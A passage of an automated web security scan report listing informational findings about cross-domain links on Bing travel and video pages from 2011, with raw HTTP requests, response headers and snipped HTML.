<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,266.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,268.1')">Help</a>
...[SNIP]...

22.398. http://www.bing.com/travel/hotels

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /travel/hotels

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /travel/hotels?cid=msn_tab&form=trvcon HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Length: 33726
Content-Type: text/html; charset=utf-8
Content-Language: en-US
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:53:04 GMT
Connection: close
Set-Cookie: lbc=815; Domain=.bing.com; Path=/travel
Set-Cookie: ETID=BCID-z18eekj7qbvdloyz7o9t8m5l64jfq_VID-zhsolb3a21fh4yz48ur0251f5tc5_UID-; Domain=.bing.com; Expires=Mon, 28-Jan-2013 23:53:04 GMT; Path=/travel
Set-Cookie: JSESSIONID=5AA03B20B965054DE6A00C283694D6F2; Domain=.bing.com; Path=/travel
Set-Cookie: _SS=SID=670C758B51DB456797B1C247AFC69A86; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:53:04 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c393ed45e9ddb45cebb21b8419ba995f9; expires=Mon, 28-Jan-2013 23:53:04 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619993&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:53:04 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html >
<head><meta content="text/html; charset=utf-8" http-equiv="content-
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,81.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,83.1')">Hotmail</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,94.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,96.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,98.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,100.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,102.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,104.1')">Help</a>
...[SNIP]...

22.399. http://www.bing.com/videos/browse

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/browse

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /videos/browse?from=en-us_msnhp HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 16742
Content-Type: text/html; charset=utf-8
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:21 GMT
Connection: close
Set-Cookie: _SS=SID=8AAD1D20A0D44F4A958E8BC645FCE285; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:21 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c29d1b901c82241e5b9b26fbb5dbd8567; expires=Mon, 28-Jan-2013 23:52:21 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:21 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:Web="h
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,29.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,31.1')">Hotmail</a>
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,42.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,44.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,46.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,48.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,50.1')">About our ads</a>
...[SNIP]...

22.400. http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa?q=The+Bachelor&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=667
Content-Length: 106262
Content-Type: text/html; charset=utf-8
Expires: Sun, 30 Jan 2011 17:11:05 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sun, 30 Jan 2011 16:59:58 GMT
Connection: close
Set-Cookie: _SS=SID=6FBAF5DF92E74053A05972DB25FA761C; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Tue, 29-Jan-2013 16:59:58 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c7a7c6b49258248c2b9414cc9e095d037; expires=Tue, 29-Jan-2013 16:59:58 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1621019&D=1593447&AF=NOFORM; expires=Tue, 29-Jan-2013 16:59:58 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fbachelor-brad-womack-part-1%2f17w4gt3fa%3ffrom%3den-us_fblike&amp;locale=en_US&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;font=arial&amp;colorscheme=dark&amp;height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http&#58;&#47;&#47;img1.video.s-redacted&#47;res&#47;1.0.3710.02&#47;i&#47;videoModule&#47;timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.hulu.com&#47;the-tonight-show-with-jay-leno" data-instName="InfoRelatedLinks">Hulu - The Tonight Show with Jay Leno</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.hulu.com&#47;watch&#63;content_id&#61;50117742" data-instName="InfoRelatedLinks">Hulu Watch Page - Bachelor Brad Womack, Part 1</a>
...[SNIP]...
lor&rel=MSN" class="motionThumb playerUrl"
title="We&#32;recap&#32;&#34;The&#32;Bachelor,&#34;&#32;&#34;House,&#34;&#32;&#34;19&#32;Kids&#32;and&#32;Counting&#34;&#32;and&#32;&#34;Skins.&#34;" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;43065b0c-5953-34d2-e109-849136b24fc4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;shares&#32;a&#32;personal&#32;story&#32;with&#32;the&#32;rest&#32;of&#32;the&#32;ladies.&#32;&#34;The&#32;Bachelor&#34;&#32;airs&#32;Mondays&#32;at&#32;8&#32;p.m.&#32;ET&#47;PT&#32;on&#32;ABC." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;44ab0283-7d4d-490a-bf56-a89601f19d8f&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
ies,&#32;starring&#32;&#34;Bachelor&#34;&#32;alum&#32;Brad&#32;Womack.&#32;&#34;The&#32;Bachelor&#34;&#32;returns&#32;Monday,&#32;Jan.&#32;3,&#32;at&#32;8&#32;p.m.&#32;ET&#47;PT&#32;on&#32;ABC." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;ace94fcc-a11e-46dc-8876-396aaf0d06e4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
helor&#32;Brad&#32;Womack&#32;gets&#32;a&#32;message&#32;from&#32;every&#32;woman&#32;in&#32;America.&#32;&#34;The&#32;Bachelor&#34;&#32;premieres&#32;Monday,&#32;January&#32;3,&#32;on&#32;ABC." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;29c72bc5-8bec-4507-8628-d78be2839869&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
32;sees&#32;Brad&#32;kissing&#32;other&#32;girls&#32;on&#32;his&#32;one-on-one&#32;dates.&#32;&#34;The&#32;Bachelor&#34;&#32;airs&#32;Mondays&#32;at&#32;8&#32;p.m.&#32;ET&#47;PT&#32;on&#32;ABC." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;0d1c240e-7bf9-416b-95d4-75f4f5ffc8e0&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
#32;Croft&#32;confront&#32;Brad&#32;Womack&#32;about&#32;the&#32;past.&#32;&#34;The&#32;Bachelor&#34;&#32;returns&#32;Monday,&#32;Jan.&#32;3,&#32;at&#32;8&#32;p.m.&#32;ET&#47;PT&#32;on&#32;ABC." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;6a5e9ed3-864e-44e1-8647-406388ff03a6&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;of&#32;Love&#58;&#32;Women&#32;Tell&#32;All&#34;&#32;airs.&#32;The&#32;31-year-old&#32;airline&#32;pilot&#32;says&#32;he&#32;wasn&#39;t&#32;nervous&#32;about&#32;facing&#32;the&#32;ladies." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;ad3c2eb0-1f32-11df-bdab-297063a74c6d&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
class="motionThumb playerUrl"
title="&#34;The&#32;Bachelor&#34;&#32;host&#32;Chris&#32;Harrison&#32;dishes&#32;with&#32;ET&#32;about&#32;Jason&#32;Mesnick&#39;s&#32;controversial&#32;choice." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;96753e0a-093b-11de-a48f-df3463a74c6d&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
2;woman&#39;s&#32;got&#32;to&#32;do&#32;what&#32;a&#32;woman&#39;s&#32;got&#32;to&#32;do.&#32;&#34;The&#32;Bachelor&#34;&#32;airs&#32;Mondays&#32;at&#32;8&#32;p.m.&#32;ET&#47;PT&#32;on&#32;ABC." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;0adbe522-6a74-451d-8cd6-9845b029ea9f&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
not&#32;before&#32;he&#32;faces&#32;down&#32;Jenni&#32;and&#32;DeAnna.&#32;&#34;The&#32;Bachelor&#34;&#32;returns&#32;Monday,&#32;Jan.&#32;3,&#32;at&#32;8&#32;p.m.&#32;ET&#47;PT&#32;on&#32;ABC." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;93460806-1390-4bcc-b73e-707aa1ec15b2&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
en&#32;shot&#32;and&#32;killed&#32;while&#32;trying&#32;to&#32;storm&#32;the&#32;Egyptian&#32;interior&#32;ministry&#32;in&#32;Cairo.&#32;CBNC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;e177ac59-7cfe-4492-a8b4-55915bc801ac&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
unt&#32;of&#32;snow&#32;residents&#32;in&#32;the&#32;Northeast&#32;can&#32;expect&#32;to&#32;see&#32;as&#32;well&#32;as&#32;a&#32;chilly&#32;system&#32;expected&#32;to&#32;hit&#32;the&#32;West." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9496e26e-5c57-466b-bd0d-af7ab8a49f84&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
streets&#32;of&#32;Cairo,&#32;Egypt,&#32;while&#32;continuing&#32;to&#32;demand&#32;the&#32;removal&#32;of&#32;President&#32;Mubarak.&#32;CNBC&#39;s&#32;Yousef&#32;Gamal&#32;El-Din&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;93f4a343-3ee5-49a2-bfa8-99e055385b9c&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;a&#32;gorilla&#32;in&#32;a&#32;British&#32;wildlife&#32;preserve&#32;that&#8217;s&#32;becoming&#32;an&#32;internet&#32;sensation&#32;by&#32;the&#32;way&#32;he&#32;walks&#32;like&#32;a&#32;man." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;38ae05db-21f0-4232-935c-dc0482988d92&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
&#32;fine&#32;diplomatic&#32;line&#32;with&#32;Egyptian&#32;officials&#32;as&#32;unrest&#32;grows&#32;in&#32;the&#32;streets&#32;of&#32;Cairo.&#32;NBC&#39;s&#32;Andrea&#32;Mitchell&#32;reports." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;9f5e7858-a321-4506-bd48-5fe5c11524e4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
<li><a href="http://g.live.com/9uxp9en-us/ftr1" onmousedown="return si_T('&amp;ID=FD,52.1')">&#169; 2011 Microsoft</a>
...[SNIP]...
<li><a href="http://go.microsoft.com/fwlink/?LinkId=74170" onmousedown="return si_T('&amp;ID=FD,54.1')">Privacy</a> | </li><li><a href="http://g.redacted/0TO_/enus" onmousedown="return si_T('&amp;ID=FD,56.1')">Legal</a> | </li><li><a href="http://advertising.microsoft.com/advertise-on-bing" onmousedown="return si_T('&amp;ID=FD,58.1')">Advertise</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us" target="_blank" onmousedown="return si_T('&amp;ID=FD,60.1')">About our ads</a>
...[SNIP]...
<li><a href="http://onlinehelp.microsoft.com/en-us/bing/ff808541.aspx" id="sb_help" target="_blank" onmousedown="return si_T('&amp;ID=FD,62.1')">Help</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;BingPost.js"></script>
...[SNIP]...

22.401. http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bing.com
Path:   /videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa?q=The+Bachelor&rel=msn&from=en-us_msnhp&form=MSNRLL&gt1=42008 HTTP/1.1
Host: www.bing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: SRCHUID=V=2&GUID=616EE72E193A469889DD7EFDDDD7C5E7; _UR=OMW=1; OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2ce100a7b159d64d278689aec694168428; MUID=F741A5D3C8544F77A0B57D8439E7E06E; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110111; SRCHD=MS=1593447&D=1593447&AF=NOFORM;

Response

HTTP/1.1 200 OK
Cache-Control: private, max-age=205
Content-Length: 106002
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:55:54 GMT
X-AspNet-Version: 2.0.50727
X-UA-Compatible: IE=7
Date: Sat, 29 Jan 2011 23:52:28 GMT
Connection: close
Set-Cookie: _SS=SID=526744E78A5C45B4A8C55A348BE8B072; domain=.bing.com; path=/
Set-Cookie: MUID=F741A5D3C8544F77A0B57D8439E7E06E; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/
Set-Cookie: OrigMUID=F741A5D3C8544F77A0B57D8439E7E06E%2c0c3b1caf1c6f4efba4bfa2e6a6311370; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/
Set-Cookie: OVR=flt=0&flt2=0&flt3=0&flt4=0&flt5=0&flt6=0&ramp1=0&release=or3&preallocation=0&R=1; domain=.bing.com; path=/
Set-Cookie: SRCHD=MS=1619992&D=1593447&AF=NOFORM; expires=Mon, 28-Jan-2013 23:52:28 GMT; domain=.bing.com; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta content="text/html; charset=utf-8" h
...[SNIP]...
<link rel="canonical" href="http://www.bing.com/videos/watch/video/bachelor-brad-womack-part-1/17w4gt3fa" /><link rel="stylesheet" href="http://img1.video.s-redacted/res/1.0.3710.02/css/BingStyles.css" type="text/css"/><style type="text/css">
...[SNIP]...
</style><script type="text/javascript" src="http&#58;&#47;&#47;col.stj.s-redacted&#47;br&#47;sc&#47;js&#47;jquery&#47;jquery-1.4.2.min.js"></script><script type="text/javascript" src="http&#58;&#47;&#47;img2.video.s-redacted&#47;res&#47;1.0.3710.02&#47;js&#47;VideoPre.js"></script>
...[SNIP]...
<li><a href="http://www.redacted/" onmousedown="return si_T('&amp;ID=FD,39.1')">MSN</a></li><li><a href="http://mail.live.com/" onmousedown="return si_T('&amp;ID=FD,41.1')">Hotmail</a>
...[SNIP]...
<div class="facebookLike"><iframe src="http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.bing.com%2fvideos%2fwatch%2fvideo%2fbachelor-brad-womack-part-1%2f17w4gt3fa%3ffrom%3den-us_fblike&amp;locale=en_US&amp;layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;font=arial&amp;colorscheme=dark&amp;height=21" scrolling="no" frameborder="0" style="width:100%; height: 100%; overflow: hidden; border:none;" allowTransparency="true"></iframe>
...[SNIP]...
<span class="playmsg"><img class="playclock" src="http&#58;&#47;&#47;img1.video.s-redacted&#47;res&#47;1.0.3710.02&#47;i&#47;videoModule&#47;timer.gif" /><span class='count p1-4'>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.hulu.com&#47;the-tonight-show-with-jay-leno" data-instName="InfoRelatedLinks">Hulu - The Tonight Show with Jay Leno</a>
...[SNIP]...
<div class="linkRow row">
<a class="relatedLink" href="http&#58;&#47;&#47;www.hulu.com&#47;watch&#63;content_id&#61;50117742" data-instName="InfoRelatedLinks">Hulu Watch Page - Bachelor Brad Womack, Part 1</a>
...[SNIP]...
lor&rel=MSN" class="motionThumb playerUrl"
title="We&#32;recap&#32;&#34;The&#32;Bachelor,&#34;&#32;&#34;House,&#34;&#32;&#34;19&#32;Kids&#32;and&#32;Counting&#34;&#32;and&#32;&#34;Skins.&#34;" >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;43065b0c-5953-34d2-e109-849136b24fc4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
ies,&#32;starring&#32;&#34;Bachelor&#34;&#32;alum&#32;Brad&#32;Womack.&#32;&#34;The&#32;Bachelor&#34;&#32;returns&#32;Monday,&#32;Jan.&#32;3,&#32;at&#32;8&#32;p.m.&#32;ET&#47;PT&#32;on&#32;ABC." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;ace94fcc-a11e-46dc-8876-396aaf0d06e4&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
helor&#32;Brad&#32;Womack&#32;gets&#32;a&#32;message&#32;from&#32;every&#32;woman&#32;in&#32;America.&#32;&#34;The&#32;Bachelor&#34;&#32;premieres&#32;Monday,&#32;January&#32;3,&#32;on&#32;ABC." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;29c72bc5-8bec-4507-8628-d78be2839869&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
;shares&#32;a&#32;personal&#32;story&#32;with&#32;the&#32;rest&#32;of&#32;the&#32;ladies.&#32;&#34;The&#32;Bachelor&#34;&#32;airs&#32;Mondays&#32;at&#32;8&#32;p.m.&#32;ET&#47;PT&#32;on&#32;ABC." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;44ab0283-7d4d-490a-bf56-a89601f19d8f&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
32;sees&#32;Brad&#32;kissing&#32;other&#32;girls&#32;on&#32;his&#32;one-on-one&#32;dates.&#32;&#34;The&#32;Bachelor&#34;&#32;airs&#32;Mondays&#32;at&#32;8&#32;p.m.&#32;ET&#47;PT&#32;on&#32;ABC." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;0d1c240e-7bf9-416b-95d4-75f4f5ffc8e0&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
#32;Croft&#32;confront&#32;Brad&#32;Womack&#32;about&#32;the&#32;past.&#32;&#34;The&#32;Bachelor&#34;&#32;returns&#32;Monday,&#32;Jan.&#32;3,&#32;at&#32;8&#32;p.m.&#32;ET&#47;PT&#32;on&#32;ABC." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img2.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;6a5e9ed3-864e-44e1-8647-406388ff03a6&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
2;woman&#39;s&#32;got&#32;to&#32;do&#32;what&#32;a&#32;woman&#39;s&#32;got&#32;to&#32;do.&#32;&#34;The&#32;Bachelor&#34;&#32;airs&#32;Mondays&#32;at&#32;8&#32;p.m.&#32;ET&#47;PT&#32;on&#32;ABC." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;0adbe522-6a74-451d-8cd6-9845b029ea9f&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
class="motionThumb playerUrl"
title="&#34;The&#32;Bachelor&#34;&#32;host&#32;Chris&#32;Harrison&#32;dishes&#32;with&#32;ET&#32;about&#32;Jason&#32;Mesnick&#39;s&#32;controversial&#32;choice." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img4.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;96753e0a-093b-11de-a48f-df3463a74c6d&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
her&#32;contestants&#32;when&#32;she&#32;returns&#32;from&#32;her&#32;shopping&#32;spree.&#32;&#34;The&#32;Bachelor&#34;&#32;airs&#32;Mondays&#32;at&#32;8&#32;p.m.&#32;ET&#47;PT&#32;on&#32;ABC." >

<img class="thumb thumbSize" src="http&#58;&#47;&#47;img1.catalog.video.msn.com&#47;Image.aspx&#63;uuid&#61;fb70b5cf-e1ce-463f-98e1-802a4aabcfdc&#38;w&#61;160&#38;h&#61;90&#38;so&#61;4" />

<span class="motionThumbContainer">
...[SNIP]...
